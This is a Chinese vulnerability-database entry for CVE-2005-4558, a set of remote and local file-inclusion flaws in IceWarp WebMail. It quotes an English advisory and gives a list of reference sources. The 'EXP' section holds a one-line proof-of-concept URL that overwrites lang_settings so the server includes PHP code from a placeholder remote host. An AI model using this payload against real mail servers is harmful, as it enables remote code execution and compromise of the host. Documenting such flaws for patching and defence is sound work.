IceWarp Web Mail多个文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1109562 漏洞类型 输入验证
发布时间 2005-12-27 更新时间 2005-12-28
CVE编号 CVE-2005-4558 CNNVD-ID CNNVD-200512-585
漏洞平台 PHP CVSS评分 6.5
|漏洞来源
https://www.exploit-db.com/exploits/26983
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200512-585
|漏洞详情
IceWarpWebMail(冰星网上邮件系统)是支持中日文邮件的WebMail服务器引擎。IceWarpWebMail中存在多个输入验证漏洞,具体如下:1)webmail和webadmin服务运行启用了register_global的PHP。在直接访问脚本时没有正确的初始化/accounts/inc/include.php和/admin/inc/include.php中的language和lang_settings变量,这可能允许覆盖变量,导致脚本包含本地或远程来源的任意PHP脚本。2)没有正确验证/dir/include.html中对lang参数的输入,导致可能包含本地资源的任意文件。3)没有正确验证/mail/settings.html中对language参数的输入,如果同覆盖lang_settings变量结合使用的话,就可能包含本地或远程资源的任意PHP脚本。4)如果/mail/include.html遇到了无法识别的HTTP_USER_AGENT字符串的话,就可能无法正确的初始化default_layout和layout_settings变量。同覆盖default_layout和layout_settings变量结合使用的话就可能导致泄漏本地文件内容。
|漏洞EXP
source: http://www.securityfocus.com/bid/16069/info
   
IceWarp Universal WebMail is prone to multiple input-validation vulnerabilities. Deerfield VisNetic Mail Server and Merak Mail Server integrate IceWarp Universal WebMail into their suites.
   
An attacker can exploit these issues to include arbitrary local or remote files containing malicious PHP code and execute it in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.
   
Additionally, an attacker can exploit these issues to obtain the contents of local files.
   
Merak Mail Server 8.3.0.r and VisNetic MailServer 8.3.0 build 1 are affected by these issues.
   
UPDATE (July 30, 2007): Symantec has confirmed that this issue is being actively exploited in the wild.


http://example.com:32000/mail/index.html?id=[current_id]&lang_settings[TEST]=test;http://[host]/;
|参考资料

来源:SECUNIA
名称:17046
链接:http://secunia.com/advisories/17046
来源:BID
名称:16069
链接:http://www.securityfocus.com/bid/16069
来源:BUGTRAQ
名称:20051227SecuniaResearch:IceWarpWebMailMultipleFileInclusionVulnerabilities
链接:http://www.securityfocus.com/archive/1/archive/1/420255/100/0/threaded
来源:MISC
链接:http://secunia.com/secunia_research/2005-62/advisory/
来源:XF
名称:visnetic-settings-file-include(23904)
链接:http://xforce.iss.net/xforce/xfdb/23904
来源:OSVDB
名称:22081
链接:http://www.osvdb.org/22081
来源:OSVDB
名称:22080
链接:http://www.osvdb.org/22080
来源:SECTRACK
名称:1015412
链接:http://securitytracker.com/id?1015412
来源:SECUNIA
名称:17865
链接:http://secunia.com/advisories/17865
来源:FULLDISC
名称:20051227SecuniaResearch:IceWarpWebMailMultipleFile
链接:http://marc.theaimsgroup.com/?l=full-disclosure&m=113570229524828&w=2